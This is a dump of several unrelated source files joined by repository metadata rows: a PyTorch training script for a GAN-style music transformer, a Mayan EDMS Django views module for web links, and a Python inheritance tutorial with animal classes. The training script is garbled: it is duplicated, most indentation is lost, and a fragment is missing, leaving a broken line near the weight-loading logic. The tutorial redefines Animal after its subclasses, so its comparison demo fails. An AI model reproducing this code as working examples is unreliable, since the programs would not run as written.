train_loss, train_acc, dis_loss, gen_loss, cre_loss, gan_accuracy, class_accuracy, creativity = train_epoch(epoch+1, model, critic, classifier, train_loader, train_loss_func, classifier_loss_func, opt, critic_opt, classifier_opt, lr_scheduler, critic_lr_scheduler, classifier_lr_scheduler, args)
print(SEPERATOR)
print("Evaluating:")
else:
print(SEPERATOR)
print("Baseline model evaluation (Epoch 0):")
# Eval
# train_loss, train_acc = eval_model(model, train_loader, train_loss_func)
eval_loss, eval_acc = eval_model(model, val_loader, eval_loss_func, args)
# Learn rate
lr = get_lr(opt)
print("Epoch:", epoch+1)
print("Avg train loss:", train_loss)
print("Avg train acc:", train_acc)
print("Avg eval loss:", eval_loss)
print("Avg eval acc:", eval_acc)
print(SEPERATOR)
print("")
new_best = False
if(eval_acc > best_eval_acc):
best_eval_acc = eval_acc
best_eval_acc_epoch = epoch+1
torch.save(model.state_dict(), best_acc_file)
torch.save(critic.state_dict(), best_acc_critic_file)
torch.save(classifier.state_dict(), best_acc_classifier_file)
new_best = True
if(eval_loss < best_eval_loss):
best_eval_loss = eval_loss
best_eval_loss_epoch = epoch+1
torch.save(model.state_dict(), best_loss_file)
torch.save(critic.state_dict(), best_loss_critic_file)
torch.save(classifier.state_dict(), best_loss_classifier_file)
new_best = True
# Writing out new bests
if(new_best):
with open(best_text, "w") as o_stream:
print("Best eval acc epoch:", best_eval_acc_epoch, file=o_stream)
print("Best eval acc:", best_eval_acc, file=o_stream)
print("")
print("Best eval loss epoch:", best_eval_loss_epoch, file=o_stream)
print("Best eval loss:", best_eval_loss, file=o_stream)
if(not args.no_tensorboard):
tensorboard_summary.add_scalar("Avg_CE_loss/train", train_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Avg_CE_loss/eval", eval_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/train", train_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/eval", eval_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Learn_rate/train", lr, global_step=epoch+1)
tensorboard_summary.add_scalar("Critic_loss/train", dis_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Gen_loss/train", gen_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity_loss/train", cre_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("GAN_accuracy/train", gan_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Class_accuracy/train", class_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity/train", creativity, global_step=epoch+1)
tensorboard_summary.flush()
if((epoch+1) % args.weight_modulus == 0):
epoch_str = str(epoch+1).zfill(PREPEND_ZEROS_WIDTH)
path = os.path.join(weights_folder, "epoch_" + epoch_str + ".pickle")
torch.save(model.state_dict(), path)
with open(results_file, "a", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow([epoch+1, lr, train_loss, train_acc, eval_loss, eval_acc])
# Sanity check just to make sure everything is gone
if(not args.no_tensorboard):
tensorboard_summary.flush()
return
if __name__ == "__main__":
main()
| 56.356021
| 307
| 0.645113
|
import os
import csv
import shutil
from datetime import datetime
from numpy import logspace
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.utils.data import DataLoader
from torch.optim import Adam
from dataset.e_piano import create_epiano_datasets, create_pop909_datasets
from model.music_transformer import MusicTransformer
from model.discriminator import MusicDiscriminator
from model.classifier import CNNDiscriminator
from model.loss import SmoothCrossEntropyLoss
from utilities.constants import *
from utilities.WGAN_GP import WassersteinLoss
from utilities.device import get_device, use_cuda
from utilities.lr_scheduling import LrStepTracker, get_lr
from utilities.argument_funcs import parse_train_args, print_train_args, write_model_params
from utilities.run_model import train_epoch, eval_model
CSV_HEADER = ["Epoch", "Learn rate", "Avg Train loss", "Train Accuracy", "Avg Eval loss", "Eval accuracy"]
dis_filter_sizes = [2, 3, 4, 5]
dis_num_filters = [300, 300, 300, 300]
BASELINE_EPOCH = -1
def main():
args = parse_train_args()
print_train_args(args)
if(args.force_cpu):
use_cuda(False)
print("WARNING: Forced CPU usage, expect model to perform slower")
print("")
eventid = f"{datetime.now().strftime('MusicTransformer-%Y.%m.%d')}_gan_{args.gan}_creative_{args.creative}_ce_{args.ce_smoothing}"
args.output_dir = args.output_dir + "/" + eventid
os.makedirs(args.output_dir, exist_ok=True)
params_file = os.path.join(args.output_dir, "model_params.txt")
write_model_params(args, params_file)
weights_folder = os.path.join(args.output_dir, "weights")
os.makedirs(weights_folder, exist_ok=True)
results_folder = os.path.join(args.output_dir, "results")
os.makedirs(results_folder, exist_ok=True)
results_file = os.path.join(results_folder, "results.csv")
best_loss_file = os.path.join(results_folder, "best_loss_weights.pickle")
best_acc_file = os.path.join(results_folder, "best_acc_weights.pickle")
best_loss_critic_file = os.path.join(results_folder, "best_loss_critic_weights.pickle")
best_acc_critic_file = os.path.join(results_folder, "best_acc_critic_weights.pickle")
best_loss_classifier_file = os.path.join(
results_folder, "best_loss_classifier_weights.pickle")
best_acc_classifier_file = os.path.join(
results_folder, "best_acc_classifier_weights.pickle")
best_text = os.path.join(results_folder, "best_epochs.txt")
if(args.no_tensorboard):
    tensorboard_summary = None
else:
    from torch.utils.tensorboard import SummaryWriter
tensorboad_dir = os.path.join(args.output_dir, "tensorboard/" + eventid)
tensorboard_summary = SummaryWriter(log_dir=tensorboad_dir)
if args.interval and args.octave:
    print("octave interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_interval_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding and args.absolute:
print("absolute dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_absolute_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/pop909_absolute', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.interval and not args.octave:
print("interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding:
print("Octave_fusion dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif not args.interval and args.octave and not args.fusion_encoding:
print("Octave dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/pop909_octave', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.logscale:
print("logscvale dataset")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_epiano0420', args.max_sequence, random_seq=True,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop0420', args.max_sequence, random_seq=True, condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
else:
classic_train, classic_val, classic_test = create_epiano_datasets(args.classic_input_dir, args.max_sequence,
condition_token = args.condition_token, octave = args.octave)
pop909_dataset = create_pop909_datasets('dataset/pop_pickle/', args.max_sequence, condition_token = args.condition_token, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1), len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
if args.data == 'both':
print("Dataset: both")
train_dataset = torch.utils.data.ConcatDataset([ classic_train, pop_train])
val_dataset = torch.utils.data.ConcatDataset([ classic_val, pop_valid])
elif args.data == 'classic':
print("Dataset: classic")
train_dataset = torch.utils.data.ConcatDataset([classic_train])
val_dataset = torch.utils.data.ConcatDataset([classic_val])
else:
print("Dataset: pop")
train_dataset = torch.utils.data.ConcatDataset([pop_train])
val_dataset = torch.utils.data.ConcatDataset([pop_valid])
test_dataset = torch.utils.data.ConcatDataset([classic_test, pop_test])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.n_workers, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
model = MusicTransformer(n_layers=args.n_layers, num_heads=args.num_heads,
d_model=args.d_model, dim_feedforward=args.dim_feedforward, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr,
condition_token = args.condition_token, interval = args.interval, octave = args.octave,
fusion = args.fusion_encoding, absolute = args.absolute, logscale=args.logscale).to(get_device())
critic = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
classifier = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
if args.creative:
classifier.load_state_dict(torch.load('best_classifier_acc_0.9883.pickle'))
weights")
return
else:
model.load_state_dict(torch.load(args.continue_weights))
start_epoch = args.continue_epoch
elif(args.continue_epoch is not None):
print("ERROR: Need continue weights (-continue_weights) when using continue_epoch")
return
if(args.lr is None):
    if(args.continue_epoch is None):
        init_step = 0
    else:
        init_step = args.continue_epoch * len(train_loader)
lr = LR_DEFAULT_START
lr_stepper = LrStepTracker(args.d_model, SCHEDULER_WARMUP_STEPS, init_step)
else:
lr = args.lr
if args.interval and args.octave:
    eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_INTERVAL)
elif args.interval and not args.octave:
    eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_INTERVAL)
elif args.octave and args.fusion_encoding and args.absolute:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif args.octave and args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_RELATIVE)
else:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD)
    if args.interval and not args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif not args.interval and args.octave and args.fusion_encoding and args.absolute:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION_ABSOLUTE, ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif not args.interval and args.octave and args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION, ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE, ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_RELATIVE, ignore_index=TOKEN_PAD_RELATIVE)
else:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE, ignore_index=TOKEN_PAD)
    classifier_loss_func = nn.CrossEntropyLoss()
    opt = Adam(model.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
    critic_opt = Adam(critic.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
classifier_opt = Adam(classifier.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
if(args.lr is None):
lr_scheduler = LambdaLR(opt, lr_stepper.step)
critic_lr_scheduler = LambdaLR(critic_opt, lr_stepper.step)
classifier_lr_scheduler = LambdaLR(classifier_opt, lr_stepper.step)
else:
        lr_scheduler = None
        critic_lr_scheduler = None
        classifier_lr_scheduler = None
    best_eval_acc = 0.0
    best_eval_acc_epoch = -1
    best_eval_loss = float("inf")
    best_eval_loss_epoch = -1
    if(not os.path.isfile(results_file)):
        with open(results_file, "w", newline="") as o_stream:
            writer = csv.writer(o_stream)
            writer.writerow(CSV_HEADER)
    for epoch in range(start_epoch, args.epochs):
        if(epoch > BASELINE_EPOCH):
print(SEPERATOR)
print("NEW EPOCH:", epoch+1)
print(SEPERATOR)
print("")
train_loss, train_acc, dis_loss, gen_loss, cre_loss, gan_accuracy, class_accuracy, creativity = train_epoch(epoch+1, model, critic, classifier, train_loader, train_loss_func, classifier_loss_func, opt, critic_opt, classifier_opt, lr_scheduler, critic_lr_scheduler, classifier_lr_scheduler, args)
print(SEPERATOR)
print("Evaluating:")
else:
print(SEPERATOR)
print("Baseline model evaluation (Epoch 0):")
eval_loss, eval_acc = eval_model(model, val_loader, eval_loss_func, args)
lr = get_lr(opt)
print("Epoch:", epoch+1)
print("Avg train loss:", train_loss)
print("Avg train acc:", train_acc)
print("Avg eval loss:", eval_loss)
print("Avg eval acc:", eval_acc)
print(SEPERATOR)
print("")
new_best = False
if(eval_acc > best_eval_acc):
best_eval_acc = eval_acc
best_eval_acc_epoch = epoch+1
torch.save(model.state_dict(), best_acc_file)
torch.save(critic.state_dict(), best_acc_critic_file)
torch.save(classifier.state_dict(), best_acc_classifier_file)
new_best = True
if(eval_loss < best_eval_loss):
best_eval_loss = eval_loss
best_eval_loss_epoch = epoch+1
torch.save(model.state_dict(), best_loss_file)
torch.save(critic.state_dict(), best_loss_critic_file)
torch.save(classifier.state_dict(), best_loss_classifier_file)
new_best = True
if(new_best):
with open(best_text, "w") as o_stream:
print("Best eval acc epoch:", best_eval_acc_epoch, file=o_stream)
print("Best eval acc:", best_eval_acc, file=o_stream)
print("")
print("Best eval loss epoch:", best_eval_loss_epoch, file=o_stream)
print("Best eval loss:", best_eval_loss, file=o_stream)
if(not args.no_tensorboard):
tensorboard_summary.add_scalar("Avg_CE_loss/train", train_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Avg_CE_loss/eval", eval_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/train", train_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/eval", eval_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Learn_rate/train", lr, global_step=epoch+1)
tensorboard_summary.add_scalar("Critic_loss/train", dis_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Gen_loss/train", gen_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity_loss/train", cre_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("GAN_accuracy/train", gan_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Class_accuracy/train", class_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity/train", creativity, global_step=epoch+1)
tensorboard_summary.flush()
if((epoch+1) % args.weight_modulus == 0):
epoch_str = str(epoch+1).zfill(PREPEND_ZEROS_WIDTH)
path = os.path.join(weights_folder, "epoch_" + epoch_str + ".pickle")
torch.save(model.state_dict(), path)
with open(results_file, "a", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow([epoch+1, lr, train_loss, train_acc, eval_loss, eval_acc])
if(not args.no_tensorboard):
tensorboard_summary.flush()
return
if __name__ == "__main__":
main()
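When args.lr is None, the script above drives Adam through a LambdaLR wrapping the LrStepTracker, i.e. an inverse-square-root warmup schedule. The following is a minimal, self-contained sketch of that pattern, assuming nothing from the repo: the noam_scale helper, its constants, and the toy Linear model are illustrative stand-ins, not the script's exact LrStepTracker.

import torch
from torch.optim import Adam
from torch.optim.lr_scheduler import LambdaLR

def noam_scale(d_model=512, warmup=4000, init_step=0):
    # Maps a step count to an lr multiplier:
    # d_model^-0.5 * min(step^-0.5, step * warmup^-1.5)
    def scale(step):
        step = max(1, step + init_step)  # LambdaLR starts counting at 0
        return (d_model ** -0.5) * min(step ** -0.5, step * warmup ** -1.5)
    return scale

model = torch.nn.Linear(8, 8)           # stand-in for the transformer
opt = Adam(model.parameters(), lr=1.0)  # base lr 1.0; the lambda supplies the scale
scheduler = LambdaLR(opt, noam_scale())
for _ in range(5):
    opt.step()        # optimizer step first...
    scheduler.step()  # ...then advance the schedule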
| true
| true
|
790dc82fad44913c8a30acf36c53c51c6aad0661
| 7,486
|
py
|
Python
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 343
|
2015-01-05T14:19:35.000Z
|
2018-12-10T19:07:48.000Z
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 191
|
2015-01-03T00:48:19.000Z
|
2018-11-30T09:10:25.000Z
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 257
|
2019-05-14T10:26:37.000Z
|
2022-03-30T03:37:36.000Z
|
import logging
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import RedirectView
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document, DocumentType
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.views.generics import (
AddRemoveView, SingleObjectCreateView, SingleObjectDeleteView,
SingleObjectEditView, SingleObjectListView
)
from mayan.apps.views.mixins import ExternalObjectViewMixin
from .events import event_web_link_edited
from .forms import WebLinkForm
from .icons import icon_web_link_setup
from .links import link_web_link_create
from .models import ResolvedWebLink, WebLink
from .permissions import (
permission_web_link_create, permission_web_link_delete,
permission_web_link_edit, permission_web_link_instance_view,
permission_web_link_view
)
logger = logging.getLogger(name=__name__)
class DocumentTypeWebLinksView(AddRemoveView):
main_object_permission = permission_document_type_edit
main_object_model = DocumentType
main_object_pk_url_kwarg = 'document_type_id'
secondary_object_model = WebLink
secondary_object_permission = permission_web_link_edit
list_available_title = _('Available web links')
list_added_title = _('Web links enabled')
related_field = 'web_links'
def action_add(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.add(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def action_remove(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.remove(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Web links to enable for document type: %s'
) % self.main_object,
}
class ResolvedWebLinkView(ExternalObjectViewMixin, RedirectView):
external_object_pk_url_kwarg = 'document_id'
external_object_permission = permission_web_link_instance_view
external_object_queryset = Document.valid.all()
def get_redirect_url(self, *args, **kwargs):
return self.get_web_link().get_redirect(
document=self.external_object, user=self.request.user
).url
def get_web_link(self):
return get_object_or_404(
klass=self.get_web_link_queryset(), pk=self.kwargs['web_link_id']
)
def get_web_link_queryset(self):
queryset = ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
return AccessControlList.objects.restrict_queryset(
permission=permission_web_link_instance_view, queryset=queryset,
user=self.request.user
)
class WebLinkCreateView(SingleObjectCreateView):
extra_context = {'title': _('Create new web link')}
form_class = WebLinkForm
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
view_permission = permission_web_link_create
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkDeleteView(SingleObjectDeleteView):
model = WebLink
object_permission = permission_web_link_delete
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Delete web link: %s') % self.object
}
class WebLinkDocumentTypesView(AddRemoveView):
main_object_method_add_name = 'document_types_add'
main_object_method_remove_name = 'document_types_remove'
main_object_permission = permission_web_link_edit
main_object_model = WebLink
main_object_pk_url_kwarg = 'web_link_id'
secondary_object_model = DocumentType
secondary_object_permission = permission_document_type_edit
list_available_title = _('Available document types')
list_added_title = _('Document types enabled')
related_field = 'document_types'
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Document type for which to enable web link: %s'
) % self.main_object,
}
class WebLinkEditView(SingleObjectEditView):
form_class = WebLinkForm
model = WebLink
object_permission = permission_web_link_edit
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Edit web link: %s') % self.object
}
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkListView(SingleObjectListView):
object_permission = permission_web_link_view
def get_extra_context(self):
return {
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_main_link': link_web_link_create.resolve(
context=RequestContext(request=self.request)
),
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
                'external resources. The link URLs can contain document '
                'property values.'
),
'no_results_title': _(
'There are no web links'
),
'title': _('Web links'),
}
def get_source_queryset(self):
return self.get_web_link_queryset()
def get_web_link_queryset(self):
return WebLink.objects.all()
class DocumentWebLinkListView(ExternalObjectViewMixin, WebLinkListView):
external_object_permission = permission_web_link_instance_view
external_object_pk_url_kwarg = 'document_id'
external_object_queryset = Document.valid.all()
object_permission = permission_web_link_instance_view
def get_extra_context(self):
return {
'document': self.external_object,
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
                'external resources. The link URLs can contain document '
                'property values.'
),
'no_results_title': _(
'There are no web links for this document'
),
'object': self.external_object,
'title': _('Web links for document: %s') % self.external_object,
}
def get_web_link_queryset(self):
return ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
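ResolvedWebLinkView above combines two standard Django pieces: a RedirectView whose get_redirect_url builds the target URL, and get_object_or_404 against a permission-restricted queryset, so unauthorized ids produce a 404 instead of leaking. A stripped-down sketch of the same shape in plain Django follows; the Bookmark model and the bookmark_id URL kwarg are hypothetical, standing in for Mayan's ACL-restricted queryset.

from django.shortcuts import get_object_or_404
from django.views.generic import RedirectView

class BookmarkRedirectView(RedirectView):
    permanent = False

    def get_queryset(self):
        # Stand-in for AccessControlList.objects.restrict_queryset():
        # only objects the requesting user may access are resolvable.
        return Bookmark.objects.filter(owner=self.request.user)  # hypothetical model

    def get_redirect_url(self, *args, **kwargs):
        # Unknown or forbidden pks raise Http404 rather than redirecting.
        bookmark = get_object_or_404(self.get_queryset(), pk=kwargs['bookmark_id'])
        return bookmark.url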
| 34.027273
| 78
| 0.687016
|
| true
| true
|
790dc9935531c6d0395bf850f4f155b21979dd25
| 4,273
|
py
|
Python
|
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 8
|
2016-10-16T13:01:30.000Z
|
2021-11-08T13:10:17.000Z
|
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | null | null | null |
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 5
|
2016-08-24T09:43:42.000Z
|
2019-11-20T10:54:29.000Z
|
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
class Mammal(Animal):
_pairs_of_eyes = 1
def __init__(self, age, is_pregnant=False):
super().__init__(age)
self._is_pregnant = is_pregnant
print("Mammal created")
@property
def is_pregnant(self):
return self._is_pregnant
@is_pregnant.setter
def is_pregnant(self, is_pregnant):
self._is_pregnant = is_pregnant
class DomesticMammal(Mammal):
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(age, is_pregnant)
self._name = name
self._favorite_toy = favorite_toy
print("DomesticMammal created")
@property
def name(self):
return self._name
@property
def favorite_toy(self):
return self._favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self._favorite_toy = favorite_toy
def talk(self):
print(self._name + ": talks")
class Dog(DomesticMammal):
_number_of_legs = 4
_breed = "Just a dog"
_breed_family = "Dog"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("Dog created")
def bark(self, times=1, other_domestic_mammal=None, is_angry=False):
message = self.name
if other_domestic_mammal is not None:
message += " to " + other_domestic_mammal.name + ": "
else:
message += ": "
if is_angry:
message += "Grr "
message += "Woof " * times
print(message)
def talk(self):
self.bark()
@classmethod
def print_breed(cls):
print(cls._breed)
@classmethod
def print_breed_family(cls):
print(cls._breed_family)
class TerrierDog(Dog):
_breed = "Terrier dog"
_breed_family = "Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("TerrierDog created")
class SmoothFoxTerrier(TerrierDog):
_breed = "Smooth Fox Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("SmoothFoxTerrier created")
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
def __lt__(self, other):
return self.age < other.age
def __le__(self, other):
return self.age <= other.age
def __gt__(self, other):
return self.age > other.age
def __ge__(self, other):
return self.age >= other.age
SmoothFoxTerrier.print_breed()
SmoothFoxTerrier.print_breed_family()
tom = SmoothFoxTerrier("Tom", 5, "Sneakers")
print(isinstance(tom, Animal))
print(isinstance(tom, Mammal))
print(isinstance(tom, DomesticMammal))
print(isinstance(tom, Dog))
print(isinstance(tom, TerrierDog))
print(isinstance(tom, SmoothFoxTerrier))
pluto = SmoothFoxTerrier("Pluto", 6, "Tennis ball")
goofy = SmoothFoxTerrier("Goofy", 8, "Soda bottle")
print(tom > pluto)
print(tom < pluto)
print(goofy >= tom)
print(tom <= goofy)
tom.bark()
tom.bark(2)
